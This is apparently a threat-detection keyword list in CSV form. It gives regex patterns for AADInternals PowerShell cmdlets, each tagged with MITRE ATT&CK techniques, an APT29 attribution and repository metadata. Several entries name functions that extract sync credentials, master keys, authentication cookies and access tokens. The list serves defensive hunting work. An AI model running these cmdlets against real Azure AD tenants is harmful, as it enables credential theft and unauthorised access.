"*Get-AADIntMyTeams*",".{0,1000}Get\-AADIntMyTeams.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntOAuthGrants*",".{0,1000}Get\-AADIntOAuthGrants.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntODAuthenticationCookie*",".{0,1000}Get\-AADIntODAuthenticationCookie.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntOfficeUpdateBranch*",".{0,1000}Get\-AADIntOfficeUpdateBranch.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntOneDriveFiles*",".{0,1000}Get\-AADIntOneDriveFiles.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntOpenIDConfiguration*",".{0,1000}Get\-AADIntOpenIDConfiguration.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntPortalAccessTokenUsingCBA*",".{0,1000}Get\-AADIntPortalAccessTokenUsingCBA.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntProxyAgents*",".{0,1000}Get\-AADIntProxyAgents.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntProxyGroups*",".{0,1000}Get\-AADIntProxyGroups.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntReadAccessTokenForAADGraph*",".{0,1000}Get\-AADIntReadAccessTokenForAADGraph.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntRecentLocations*",".{0,1000}Get\-AADIntRecentLocations.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntRolloutPolicies*",".{0,1000}Get\-AADIntRolloutPolicies.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntRolloutPolicyGroups*",".{0,1000}Get\-AADIntRolloutPolicyGroups.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntSARAUserInfo*",".{0,1000}Get\-AADIntSARAUserInfo.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntSeamlessSSO*",".{0,1000}Get\-AADIntSeamlessSSO.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntSelfServicePurchaseProducts*",".{0,1000}Get\-AADIntSelfServicePurchaseProducts.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntServiceLocations*",".{0,1000}Get\-AADIntServiceLocations.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntServicePrincipals*",".{0,1000}Get\-AADIntServicePrincipals.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntSettings*",".{0,1000}Get\-AADIntSettings.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntSharedWithUser*",".{0,1000}Get\-AADIntSharedWithUser.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntSkypeToken*",".{0,1000}Get\-AADIntSkypeToken.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntSPOAuthenticationHeader*",".{0,1000}Get\-AADIntSPOAuthenticationHeader.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntSPOIDCRL*",".{0,1000}Get\-AADIntSPOIDCRL.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntSPOServiceInformation*",".{0,1000}Get\-AADIntSPOServiceInformation.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntSPOSettings*",".{0,1000}Get\-AADIntSPOSettings.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntSPOSiteGroups*",".{0,1000}Get\-AADIntSPOSiteGroups.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntSPOSiteUsers*",".{0,1000}Get\-AADIntSPOSiteUsers.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntSPOUserProperties*",".{0,1000}Get\-AADIntSPOUserProperties.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntSubscriptions*",".{0,1000}Get\-AADIntSubscriptions.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntSyncConfiguration*",".{0,1000}Get\-AADIntSyncConfiguration.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntSyncCredentials*",".{0,1000}Get\-AADIntSyncCredentials.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntSyncDeviceConfiguration*",".{0,1000}Get\-AADIntSyncDeviceConfiguration.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntSyncEncryptionKey*",".{0,1000}Get\-AADIntSyncEncryptionKey.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntSyncEncryptionKeyInfo*",".{0,1000}Get\-AADIntSyncEncryptionKeyInfo.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntSyncFeatures*",".{0,1000}Get\-AADIntSyncFeatures.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntSyncObjects*",".{0,1000}Get\-AADIntSyncObjects.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntSystemMasterkeys*",".{0,1000}Get\-AADIntSystemMasterkeys.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntTeamsAvailability*",".{0,1000}Get\-AADIntTeamsAvailability.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntTeamsMessages*",".{0,1000}Get\-AADIntTeamsMessages.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntTenantApplications*",".{0,1000}Get\-AADIntTenantApplications.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntTenantAuthenticationMethods*",".{0,1000}Get\-AADIntTenantAuthenticationMethods.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntTenantAuthPolicy*",".{0,1000}Get\-AADIntTenantAuthPolicy.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntTenantDetails*",".{0,1000}Get\-AADIntTenantDetails.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntTenantDomain*",".{0,1000}Get\-AADIntTenantDomain.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntTenantDomains*",".{0,1000}Get\-AADIntTenantDomains.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntTenantGuestAccess*",".{0,1000}Get\-AADIntTenantGuestAccess.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntTenantID*",".{0,1000}Get\-AADIntTenantID.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntTenantOrganisationInformation*",".{0,1000}Get\-AADIntTenantOrganisationInformation.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntTranslation*",".{0,1000}Get\-AADIntTranslation.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntUnifiedAuditLogSettings*",".{0,1000}Get\-AADIntUnifiedAuditLogSettings.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntUserConnections*",".{0,1000}Get\-AADIntUserConnections.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntUserDetails*",".{0,1000}Get\-AADIntUserDetails.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
